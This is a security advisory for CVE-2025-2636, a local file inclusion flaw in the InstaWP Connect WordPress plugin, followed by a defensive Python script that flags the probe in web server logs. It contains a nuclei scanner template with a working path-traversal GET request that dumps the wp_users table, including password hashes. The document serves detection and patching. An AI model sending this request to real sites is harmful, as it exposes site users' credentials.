The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
PoC code [publicly available]
id: CVE-2025-2636

info:
  name: InstaWP Connect < 0.1.0.86 - Local PHP File Inclusion
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
  remediation: |
    Update InstaWP Connect plugin to version 0.1.0.86 or later.
  reference:
    - https://wpscan.com/vulnerability/d1b64725-d4ae-4d73-950a-b772a877022b/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2c6f-c231-477c-895b-df892569ef95
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2636
  classification:
    epss-score: 0.09761
    epss-percentile: 0.92666
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2636
    cwe-id: CWE-22
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="/wp-content/plugins/instawp-connect"
  tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev

http:
  - raw:
      - |
        GET /?instawp-database-manager=/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'instawp-wrap'
          - 'user_pass</th>'
          - 'user_email</th>'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200268a36e36a8bba3ad302dcce73c8f4da0d8dd5003963bafd2fe4c04f517f3d902207a0eaea5f85f436ec28f4e4a225e1fada22f557f7d5b678ce86b1065a101da31:922c64590222798bb761d5b6d8e72950
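The template above is the scanner's view; the defender's counterpart is spotting the same request pattern in web server logs. The following is an added example, not part of the nuclei template or the InstaWP plugin: it parses combined-format access log lines (constructed samples, not real traffic), decodes the `instawp-database-manager` value repeatedly so that double percent-encoding does not hide it, and flags any value that still carries a `../` path segment. It assumes legitimate values for that parameter never contain traversal.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

PARAM = "instawp-database-manager"
# A ".." path segment ("../" or "..\") anywhere in the decoded value
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Apache/nginx combined-format prefix: client IP, timestamp, request line, status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) before inspecting."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_cve_2025_2636_probe(request_line):
    """True if the request's instawp-database-manager value carries path traversal."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get(PARAM, [])  # one decode pass
    return any(TRAVERSAL.search(fully_decode(v)) for v in values)

def scan_log(lines):
    """Return (client_ip, status) for every access-log line that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cve_2025_2636_probe(m.group("req")):
            hits.append((m.group("ip"), int(m.group("status"))))
    return hits

# Constructed sample log: line 1 mirrors the template's request, line 2 is ordinary
# traffic, line 3 is the same parameter with double percent-encoding (hypothetical).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2025:12:00:01 +0000] "GET /?instawp-database-manager='
    '/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Apr/2025:12:00:02 +0000] "GET /?p=12 HTTP/1.1" 200 8192',
    '203.0.113.5 - - [10/Apr/2025:12:00:03 +0000] "GET /?instawp-database-manager='
    '%252e%252e%252f%252e%252e%252fwp-config HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for ip, status in scan_log(SAMPLE_LOG):
        # A 200 here is the same signal the template's status matcher keys on.
        print(f"probe from {ip}, server answered {status}")
```

A hit with status 200 on an unpatched site (< 0.1.0.86) deserves the same response as a confirmed template match; a 404 still records who is probing.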